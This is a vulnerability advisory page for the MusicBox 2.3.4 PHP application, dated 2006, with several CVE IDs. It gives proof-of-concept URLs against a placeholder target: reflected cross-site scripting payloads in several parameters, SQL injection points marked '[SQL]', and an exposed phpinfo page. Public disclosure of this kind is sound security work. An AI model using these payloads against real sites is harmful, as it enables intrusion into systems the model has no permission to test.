MusicBox <= 2.3.4 XSS SQL injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053169 漏洞类型
发布时间 2006-07-27 更新时间 2006-07-27
CVE编号 CVE-2006-3882
CVE-2006-3881
CVE-2006-3886
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006070121
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
MusicBox 2.3.4

http://www.musicboxv2.com

------------

PHPinfo page

------------

/phpinfo.php

--------------------------

Cross Site Scripting (XSS)

--------------------------

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>
&page=0

http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)
</script>&page=0

http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/
)</script>&in=song&action=search&start=0

http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/Ell
ipsisSecurityTest/)</script>

http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSe
curityTest/)</script>&type=Artists

-------------

SQL injection

-------------

http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQ
L]

http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists

http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]

-----------------

Ellipsis Security

http://www.ellsec.org